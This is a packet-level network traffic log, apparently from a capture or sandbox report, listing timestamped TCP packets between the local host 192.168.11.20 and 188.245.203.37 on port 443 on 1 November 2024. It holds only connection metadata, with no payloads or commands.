Nov 1, 2024 20:57:51.812354088 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.815458059 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.815474033 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.815613985 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.815613985 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.815675020 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.815675020 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.815757990 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.815757990 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.815768003 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.815916061 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.818833113 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.818849087 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.818973064 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.818973064 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.819020033 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.819066048 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.819066048 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.819072962 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.819118977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.819118977 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.819216967 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.821441889 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.821458101 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.821602106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.821602106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.821655035 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.821702003 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.821702003 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.821711063 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.821753025 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.821861029 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.824047089 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.824064016 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.824212074 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.824212074 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.824255943 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.824255943 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.824255943 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.824265957 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.824356079 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.824414968 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827657938 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.827673912 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.827796936 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827796936 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827843904 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827843904 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827843904 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827843904 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827855110 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.827896118 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827945948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827945948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.827945948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.828016996 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831403017 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.831418037 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.831554890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831554890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831598997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831598997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831650972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831650972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831650972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831650972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831650972 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831661940 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.831675053 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.831828117 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.834306955 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.834322929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.834450006 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.834450006 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.834495068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.834495068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.834495068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.834505081 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.834646940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.837166071 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.837182045 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.837325096 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.837325096 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.837346077 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.837418079 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.837521076 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.837528944 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.837651968 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839600086 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.839616060 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.839732885 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839734077 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839777946 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839777946 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839777946 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839777946 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839787960 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.839829922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839829922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839829922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839874983 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.839976072 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842154980 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.842170954 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.842278957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842278957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842325926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842325926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842325926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842325926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842335939 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.842376947 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842436075 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.842483997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.844610929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.844626904 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.844748974 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.844748974 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.844844103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.844849110 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.844916105 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.844916105 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.844995975 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.847609997 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.847625017 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.847764969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.847764969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.847814083 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.847862959 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.847868919 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.847912073 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.848090887 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.849947929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.849963903 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.850080967 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850126982 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850126982 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850126982 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850126982 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850136042 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.850198984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850198984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850198984 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850224018 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.850296974 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852453947 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.852468967 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.852603912 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852648020 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852648020 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852654934 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.852699995 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852699995 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852699995 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852797031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.852797031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855093002 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.855108023 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.855230093 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855230093 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855274916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855274916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855274916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855274916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855274916 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855284929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.855370998 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.855458975 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.857861996 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.857877016 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.857988119 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.857988119 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.857988119 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.858032942 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.858134031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.858139038 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.858323097 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.860008001 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.860027075 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.860193968 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.860193968 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.860208035 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.860244036 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.860244036 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.860342026 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.860389948 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.862658024 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.862677097 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.862807035 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.862807035 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.862857103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.862857103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.862857103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.862868071 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.862951040 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.863028049 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.864841938 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.864860058 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.864981890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.864981890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.865025043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.865025043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.865025043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.865025043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.865036011 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.865104914 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.865174055 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.865225077 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.867496014 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.867515087 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.867723942 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.867723942 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.867736101 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.867769957 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.867939949 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.869556904 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.869574070 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.869723082 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.869827986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.869827986 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.869836092 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.870125055 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.872421026 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.872438908 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.872572899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.872572899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.872618914 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.872625113 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.872694969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.872829914 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.874710083 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.874728918 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.874883890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.874883890 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.874933958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.874933958 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.874943972 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.875027895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.875089884 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.877125978 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.877145052 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.877253056 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.877253056 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.877346992 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.877346992 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.877353907 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.877399921 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.877523899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881182909 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.881201029 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.881331921 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881331921 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881377935 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881377935 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881377935 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881387949 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.881429911 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881429911 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881431103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881478071 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.881573915 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.884099007 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.884118080 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.884612083 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.884624004 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.884957075 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.886415005 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.886431932 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.886599064 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.886599064 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.886643887 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.886643887 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.886643887 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.886653900 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.886744022 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.886789083 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888500929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.888519049 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.888653994 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888653994 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888698101 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888698101 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888698101 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888698101 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888708115 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.888881922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.888900995 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.890966892 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.890986919 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.891772985 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.891772985 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.891787052 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.892513990 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.894469023 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.894494057 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.894618034 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.894618988 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.894663095 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.894712925 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.894712925 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.894722939 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.894809961 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.894861937 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.895987034 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.896014929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.896136999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896136999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896163940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896234989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896234989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896234989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896234989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896255016 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.896269083 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896269083 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.896384954 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.898158073 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.898191929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.898296118 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.898296118 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.898371935 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.898371935 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.898442030 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.898451090 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.898490906 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.898581028 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.900789022 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.900804996 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.900953054 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.901014090 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.901014090 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.901031017 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.901043892 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.901045084 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.901129007 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.901207924 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.903074026 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.903098106 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.903197050 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.903197050 CET	49806	443	192.168.11.20	188.245.203.37
